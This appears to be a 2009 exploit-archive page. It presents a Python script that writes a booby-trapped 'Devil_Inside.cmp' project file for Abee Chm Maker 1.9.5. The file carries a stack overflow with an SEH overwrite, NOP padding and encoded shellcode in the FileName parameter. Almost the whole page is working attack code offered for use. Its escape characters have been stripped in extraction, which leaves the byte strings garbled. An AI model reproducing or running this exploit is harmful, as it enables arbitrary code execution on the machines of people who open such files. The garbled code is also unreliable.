Abee Chm Maker 1.9.5 (CMP File) Stack overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Abee Chm Maker 1.9.5 (CMP File) Stack overflow Exploit
# Published : 2009-03-27
# Author : Encrypt3d.M!nd
# Previous Title : pam-krb5 < 3.13 Local Privilege Escalation Exploit
# Next Title : Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500

# exploit.py
# Abee Chm Maker 1.9.5 Stack overflow Exploit
# By:Encrypt3d.M!nd
#
# After importing "Devil_inside.cmp" file into the program
# go to File>>Make CHM.. Then...watch  :) .
#
# i've used SEH overwrite method to make it more stable.
# btw:it's universal so don't bother your self with finding addresses  ;) 
#

ns = "xEBx06x90x90"
sh = "x05x67x35x45"

shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x37x49x49x49x49x49x49x49x49x49x51x5ax6ax61"
"x58x30x41x31x50x41x42x6bx42x41x71x32x42x42x42x32"
"x41x41x30x41x41x58x38x42x42x50x75x4dx39x69x6cx4d"
"x38x43x74x35x50x53x30x77x70x4ex6bx53x75x77x4cx4c"
"x4bx63x4cx54x45x34x38x67x71x5ax4fx6cx4bx62x6fx75"
"x48x6ex6bx41x4fx47x50x33x31x58x6bx63x79x4ex6bx36"
"x54x4cx4bx45x51x68x6ex34x71x59x50x4cx59x4cx6cx4f"
"x74x6fx30x72x54x47x77x58x41x39x5ax34x4dx57x71x69"
"x52x48x6bx69x64x67x4bx46x34x66x44x74x44x53x45x6b"
"x55x4cx4bx43x6fx31x34x67x71x78x6bx63x56x4cx4bx54"
"x4cx62x6bx6ex6bx31x4fx67x6cx37x71x78x6bx4cx4bx45"
"x4cx4cx4bx73x31x4ax4bx6cx49x51x4cx74x64x67x74x6b"
"x73x34x71x6fx30x42x44x6cx4bx71x50x34x70x4ex65x4f"
"x30x62x58x46x6cx6cx4bx41x50x44x4cx4cx4bx42x50x65"
"x4cx4ex4dx6ex6bx50x68x34x48x4ax4bx73x39x6ex6bx4b"
"x30x4cx70x57x70x63x30x37x70x4ex6bx42x48x57x4cx51"
"x4fx56x51x48x76x31x70x73x66x6ex69x59x68x4ex63x4f"
"x30x73x4bx66x30x65x38x68x70x6dx5ax34x44x51x4fx30"
"x68x4ex78x4bx4ex6cx4ax54x4ex32x77x79x6fx79x77x41"
"x73x75x31x72x4cx41x73x57x70x61")

header1 = (
'<?xml version="1.0" encoding="Windows-1252" ?>n'
'<XMLConfig><info>Chm Maker project</info>n'
'<group name="Contents">n'
' <group name="0">n'
'  <param name="Caption">filename</param>n'
'  <param name="Level">0</param>n'
'  <param name="FileName">'+"x41"*320+ns+sh+"x90"*20+shellcode+"x41" * 5000)

header2 = (
'</param>n'
' </group>n'
' <param name="Count">1</param>n'
'</group>n'
'<group name="Keywords">n'
' <param name="Count">0</param>n'
'</group>n'
'<group name="KeywordsFinder">n'
' <param name="UseMeta">1</param>n'
' <param name="UseBold">1</param>n'
' <param name="UseItalic">0</param>n'
' <param name="UseUnder">0</param>n'
' <param name="UseHTag">1</param>n'
' <param name="UseTabHeader">0</param>n'
' <param name="MaxKeyLength">32</param>n'
' <param name="LiveUpdate">0</param>n'
'</group>n'
'<group name="Customize">n'
' <param name="MainTitle">kkkkkkkkkkkkkkk</param>n'
' <param name="DefaultPage"></param>n'
' <param name="Left">0</param>n'
' <param name="Top">0</param>n'
' <param name="Width">0</param>n'
' <param name="Heigth">0</param>n'
' <param name="HideShow">1</param>n'
' <param name="Back">1</param>n'
' <param name="Forward">1</param>n'
' <param name="Stop">0</param>n'
' <param name="Refresh">0</param>n'
' <param name="Options">1</param>n'
' <param name="Print">1</param>n'
' <param name="Font">0</param>n'
' <param name="Locate">0</param>n'
' <param name="Home">0</param>n'
' <param name="HomePage"></param>n'
' <param name="Jump1">0</param>n'
' <param name="Jump1Page"></param>n'
' <param name="Jump1Title"></param>n'
' <param name="Jump2">0</param>n'
' <param name="Jump2Page"></param>n'
' <param name="Jump2Title"></param>n'
' <param name="Search">1</param>n'
' <param name="AdditionalFiles"></param>n'
'</group>n'
'</XMLConfig>n'
)


file=open('Devil_Inside.cmp','w')
file.write(header1+header2)
file.close()

# www.Syue.com [2009-03-27]